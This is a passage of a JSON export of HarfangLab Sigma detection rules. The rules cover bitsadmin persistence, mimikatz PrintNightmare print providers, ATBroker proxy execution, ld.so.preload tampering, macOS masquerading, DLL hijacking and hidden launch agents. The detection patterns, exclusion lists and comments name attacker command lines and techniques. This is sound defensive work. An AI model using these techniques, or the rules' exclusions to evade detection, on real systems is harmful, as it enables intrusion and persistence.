"hl_testing_start_time": "2026-03-23T11:45:34.081342Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
"https://docs.microsoft.com/windows/win32/bits/about-bits",
"https://attack.mitre.org/techniques/T1197/",
"https://attack.mitre.org/software/S0190/"
],
"name": "t1197_bitsadmin_persistence.yml",
"content": "title: Persistence or Code Execution via BITS\nid: d84087b2-ec87-4a75-abe6-badf1ee886d4\ndescription: |\n Detects a suspicious attempt to maintain persistence or execute code using bitsadmin.\n Bitsadmin is a tool to manage the Background Intelligent Transfer Service (BITS) which is used to download files from or upload files to HTTP web servers and SMB file shares.\n This service is an asynchronous file transfer mechanism and it's often used by attackers to download malicious files, exfiltrate data or maintain persistence.\n By default, BITS jobs have a 90 days maximum lifetime if complete or cancel method are not called.\n It is recommended to check the legitimacy of this action and the source (for downloading)/destination (for uploading) machine.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/\n - https://docs.microsoft.com/windows/win32/bits/about-bits\n - https://attack.mitre.org/techniques/T1197/\n - https://attack.mitre.org/software/S0190/\ndate: 2021/05/10\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.defense_evasion\n - attack.t1197\n - attack.s0190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Bitsadmin\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # bitsadmin /create \n # bitsadmin /addfile \n # bitsadmin /SetNotifyCmdLine [program_parameters]\n # bitsadmin /resume \n selection_binary:\n - Image|endswith: '\\bitsadmin.exe'\n - OriginalFileName: 'bitsadmin.exe'\n\n selection_persistence:\n CommandLine|contains: 'SetNotifyCmdLine'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d84087b2-ec87-4a75-abe6-badf1ee886d4",
"rule_name": "Persistence or Code Execution via BITS",
"rule_description": "Detects a suspicious attempt to maintain persistence or execute code using bitsadmin.\nBitsadmin is a tool to manage the Background Intelligent Transfer Service (BITS) which is used to download files from or upload files to HTTP web servers and SMB file shares.\nThis service is an asynchronous file transfer mechanism and it's often used by attackers to download malicious files, exfiltrate data or maintain persistence.\nBy default, BITS jobs have a 90 days maximum lifetime if complete or cancel method are not called.\nIt is recommended to check the legitimacy of this action and the source (for downloading)/destination (for uploading) machine.\n",
"rule_creation_date": "2021-05-10",
"rule_modified_date": "2025-02-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1197"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d844ae3d-4e16-4374-947d-6f17eb0a954d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595280Z",
"creation_date": "2026-03-23T11:45:34.595283Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595291Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675",
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675"
],
"name": "t1574_spoolsv_new_mimikatz_provider.yml",
"content": "title: Mimikatz Print Provider Added\nid: d844ae3d-4e16-4374-947d-6f17eb0a954d\ndescription: |\n Detects the installation of a new print provider by running mimikatz's PrintNightmare implementation.\n Attackers can install a new print provider as part of CVE-2021-1675 to gain code execution in spoolsv.\n It is recommended to isolate the infected host and to look for attacker activities on other hosts.\nreferences:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675\ndate: 2021/07/06\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1574\n - attack.s0002\n - cve.2021-1675\n - classification.Windows.Source.Registry\n - classification.Windows.Exploit.CVE-2021-1675\n - classification.Windows.Exploit.PrintNightmare\n - classification.Windows.HackTool.Mimikatz\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n Image|endswith: '\\spoolsv.exe'\n # spoolsv AddNewProvider function is in charge of writting it.\n # HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\mimikatz-{438047e2-911d-4073-9be6-be3530c13385}-reallylegitprinter\\Configuration File\n TargetObject:\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows *\\Drivers\\Version-?\\mimikatz-{????????-????-????-????-????????????}-reallylegitprinter\\Configuration File'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows *\\Drivers\\Version-?\\{????????-????-????-????-????????????}-legitprinter\\Configuration File'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows *\\Drivers\\Version-?\\mimikatz-{????????-????-????-????-????????????}-legitprinter\\Configuration File'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Print\\Environments\\Windows *\\Drivers\\Version-?\\QMS 810\\Configuration File'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d844ae3d-4e16-4374-947d-6f17eb0a954d",
"rule_name": "Mimikatz Print Provider Added",
"rule_description": "Detects the installation of a new print provider by running mimikatz's PrintNightmare implementation.\nAttackers can install a new print provider as part of CVE-2021-1675 to gain code execution in spoolsv.\nIt is recommended to isolate the infected host and to look for attacker activities on other hosts.\n",
"rule_creation_date": "2021-07-06",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1574"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d852030e-a4ef-4fb4-91dc-a59d99d90b3f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080405Z",
"creation_date": "2026-03-23T11:45:34.080407Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080411Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Atbroker/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_atbroker.yml",
"content": "title: Suspicious Process Launched by ATBroker\nid: d852030e-a4ef-4fb4-91dc-a59d99d90b3f\ndescription: |\n Detects a suspicious process execution by ATBroker.exe, possibly to proxy execution of malicious code.\n ATBroker executes code defined in registry for a new Assistive Technology (AT). Modifications must be made to the system registry to either register or modify an existing AT service entry.\n Attackers can use this technique to execute malicious code through Microsoft-signed binaries.\n It is recommended to investigate the parent process for suspicious activities as well as to look for subsequent malicious actions stemming from the AtBroker process.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Atbroker/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/12/04\nmodified: 2025/09/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Atbroker\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessParentOriginalFileName: 'ATBroker.exe'\n ParentCommandLine|contains: ' ?start '\n\n filter_legitimate_context:\n Ancestors|contains:\n - '?:\\Windows\\System32\\AtBroker.exe|?:\\Windows\\System32\\winlogon.exe'\n - '?:\\Windows\\System32\\Utilman.exe|?:\\Windows\\System32\\winlogon.exe'\n\n filter_legitimate_signature:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n - 'NV Access Limited'\n - 'AI Squared'\n - 'Freedom Scientific Inc'\n - 'Freedom Scientific Inc.'\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d852030e-a4ef-4fb4-91dc-a59d99d90b3f",
"rule_name": "Suspicious Process Launched by ATBroker",
"rule_description": "Detects a suspicious process execution by ATBroker.exe, possibly to proxy execution of malicious code.\nATBroker executes code defined in registry for a new Assistive Technology (AT). Modifications must be made to the system registry to either register or modify an existing AT service entry.\nAttackers can use this technique to execute malicious code through Microsoft-signed binaries.\nIt is recommended to investigate the parent process for suspicious activities as well as to look for subsequent malicious actions stemming from the AtBroker process.\n",
"rule_creation_date": "2022-12-04",
"rule_modified_date": "2025-09-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d8794f80-f5c3-4bdf-ac3f-ce861e55131c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611832Z",
"creation_date": "2026-03-23T11:45:34.611836Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611843Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://tbhaxor.com/exploiting-shared-library-misconfigurations/",
"https://github.com/gianlucaborello/libprocesshider",
"https://sysdig.com/blog/hiding-linux-processes-for-fun-and-profit/",
"https://attack.mitre.org/techniques/T1574/006/"
],
"name": "t1574_006_ld_preload_modified.yml",
"content": "title: Dynamic Linker Preload Configuration Modified\nid: d8794f80-f5c3-4bdf-ac3f-ce861e55131c\ndescription: |\n Detects an attempt to modify the preload configuration of the dynamic linker.\n The modification of this configuration can be an attempt to conceal malicious activity or monitor existing processes.\n It is recommended to analyze the execution context to determine if the process has a legitimate reason to modify this file and to download the modify file via a job to ensure the new content is not malicious.\nreferences:\n - https://tbhaxor.com/exploiting-shared-library-misconfigurations/\n - https://github.com/gianlucaborello/libprocesshider\n - https://sysdig.com/blog/hiding-linux-processes-for-fun-and-profit/\n - https://attack.mitre.org/techniques/T1574/006/\ndate: 2022/11/10\nmodified: 2025/10/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1574.006\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.SystemModification\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path: '/etc/ld.so.preload'\n - TargetPath: '/etc/ld.so.preload'\n\n filter_read:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n\n exclusion_dynatrace:\n - ProcessImage: '/*/dynatrace*/agent/lib64/oneagentinstallaction'\n - ProcessCommandLine|startswith:\n - '/bin/sh /var/lib/dynatrace/oneagent/agent/downloads/dynatrace-oneagent-linux-'\n - '/bin/sh /opt/dynatrace/oneagent/agent/'\n\n exclusion_docker:\n ProcessImage: '/usr/bin/dockerd'\n\n exclusion_snap:\n ProcessImage: '/snap/snapd/*/usr/lib/snapd/snap-update-ns'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d8794f80-f5c3-4bdf-ac3f-ce861e55131c",
"rule_name": "Dynamic Linker Preload Configuration Modified",
"rule_description": "Detects an attempt to modify the preload configuration of the dynamic linker.\nThe modification of this configuration can be an attempt to conceal malicious activity or monitor existing processes.\nIt is recommended to analyze the execution context to determine if the process has a legitimate reason to modify this file and to download the modify file via a job to ensure the new content is not malicious.\n",
"rule_creation_date": "2022-11-10",
"rule_modified_date": "2025-10-16",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1574.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d8bc39d8-82f2-4be6-90df-fc4d6fd12973",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.616986Z",
"creation_date": "2026-03-23T11:45:34.616990Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.616997Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/labs/new-macos-malware-xcodespy-targets-xcode-developers-with-eggshell-backdoor/",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1036_004_susp_executable_masquerading.yml",
"content": "title: Suspicious Executable Masquerading Known Editor Name\nid: d8bc39d8-82f2-4be6-90df-fc4d6fd12973\ndescription: |\n Detects the execution of a process impersonating a known distributor.\n Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them in order to bypass simple security controls.\n It is recommended to check for malicious activities by the newly created process.\nreferences:\n - https://www.sentinelone.com/labs/new-macos-malware-xcodespy-targets-xcode-developers-with-eggshell-backdoor/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2024/09/26\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.Masquerading\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_name:\n ProcessName:\n - 'com.apple.*'\n - 'us.zoom.*'\n - 'com.docker.*'\n - 'Discord'\n - 'hurukai'\n\n selection_signature:\n - ProcessSigned: 'false'\n - ProcessSigned: 'true'\n ProcessCodesigningFlagsStr|contains: 'CS_ADHOC'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d8bc39d8-82f2-4be6-90df-fc4d6fd12973",
"rule_name": "Suspicious Executable Masquerading Known Editor Name",
"rule_description": "Detects the execution of a process impersonating a known distributor.\nAdversaries may match or approximate the name or location of legitimate files or resources when naming/placing them in order to bypass simple security controls.\nIt is recommended to check for malicious activities by the newly created process.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-01-27",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d92166e2-cf11-4553-856e-29559fdb0fe2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082607Z",
"creation_date": "2026-03-23T11:45:34.082609Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082613Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_pathping.yml",
"content": "title: DLL Hijacking via pathping.exe\nid: d92166e2-cf11-4553-856e-29559fdb0fe2\ndescription: |\n Detects potential Windows DLL Hijacking via pathping.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'pathping.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\IPHLPAPI.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d92166e2-cf11-4553-856e-29559fdb0fe2",
"rule_name": "DLL Hijacking via pathping.exe",
"rule_description": "Detects potential Windows DLL Hijacking via pathping.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d93e4f16-7bd8-4bf7-a2fc-5a659ed10bf2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.614531Z",
"creation_date": "2026-03-23T11:45:34.614535Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.614542Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/001/",
"https://attack.mitre.org/techniques/T1564/001/"
],
"name": "t1543_001_launch_agents_hidden.yml",
"content": "title: Hidden Launch Agents Created\nid: d93e4f16-7bd8-4bf7-a2fc-5a659ed10bf2\ndescription: |\n Detects the creation of an hidden launch agent file.\n Adversaries may create hidden files in order to avoid detection from users.\n It is recommended to check the process creating the file for other suspicious behaviors and that the content of the newly created file is legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1543/001/\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2024/04/30\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.001\n - attack.defense_evasion\n - attack.t1564.001\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_path:\n - Path|contains:\n - '/System/Library/LaunchAgents/'\n - '/Library/LaunchAgents/'\n - TargetPath|contains:\n - '/System/Library/LaunchAgents/'\n - '/Library/LaunchAgents/'\n selection_kind:\n Kind:\n - 'create'\n - 'rename'\n ProcessImage|contains: '?'\n\n selection_hidden:\n - Path|re: '.*/\\.[^/]*$'\n - TargetPath|re: '.*/\\.[^/]*$'\n\n filter_nosync: # SIP related file\n - Path|endswith: '/.dat.nosync*.??????'\n - TargetPath|endswith: '/.dat.nosync*.??????'\n\n exclusion_bomgar:\n Path: '/Library/LaunchDaemons/.com.bomgar.bomgar-ps-*.helper/run.state'\n\n exclusion_temp_file:\n - Image: '/usr/bin/vim'\n Path|endswith:\n - '.swp'\n - '.swx'\n - Image: '/usr/bin/ditto'\n Path|endswith: '/.BC.?_*'\n - Image: '/usr/bin/ditto'\n TargetPath|endswith: '/.BC.?_*'\n\n exclusion_finder:\n Image: '/System/Library/CoreServices/Finder.app/Contents/MacOS/Finder'\n Path|endswith: '.DS_Store'\n\n exclusion_rsync:\n Image: '/usr/bin/rsync'\n\n exclusion_sed:\n # /private/var/root/Library/LaunchAgents/.!78671!com.f5.f5vpnhelper.plist\n - Path|endswith: '/.!?????!*.plist'\n Image: '/usr/bin/sed'\n - TargetPath|endswith: '/.!?????!*.plist'\n Image: '/usr/bin/sed'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d93e4f16-7bd8-4bf7-a2fc-5a659ed10bf2",
"rule_name": "Hidden Launch Agents Created",
"rule_description": "Detects the creation of an hidden launch agent file.\nAdversaries may create hidden files in order to avoid detection from users.\nIt is recommended to check the process creating the file for other suspicious behaviors and that the content of the newly created file is legitimate.\n",
"rule_creation_date": "2024-04-30",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1543.001",
"attack.t1564.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d956a4b6-4d5e-445a-9d2e-65dfe014661d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096630Z",
"creation_date": "2026-03-23T11:45:34.096632Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096637Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msdt.yml",
